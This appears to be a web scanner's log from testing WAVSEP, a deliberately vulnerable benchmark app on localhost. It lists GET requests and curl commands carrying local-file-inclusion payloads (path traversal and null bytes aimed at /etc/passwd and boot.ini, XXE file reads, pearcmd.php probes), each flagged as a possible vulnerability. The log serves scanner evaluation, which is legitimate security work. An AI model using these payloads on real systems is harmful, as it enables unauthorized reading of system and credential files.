GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
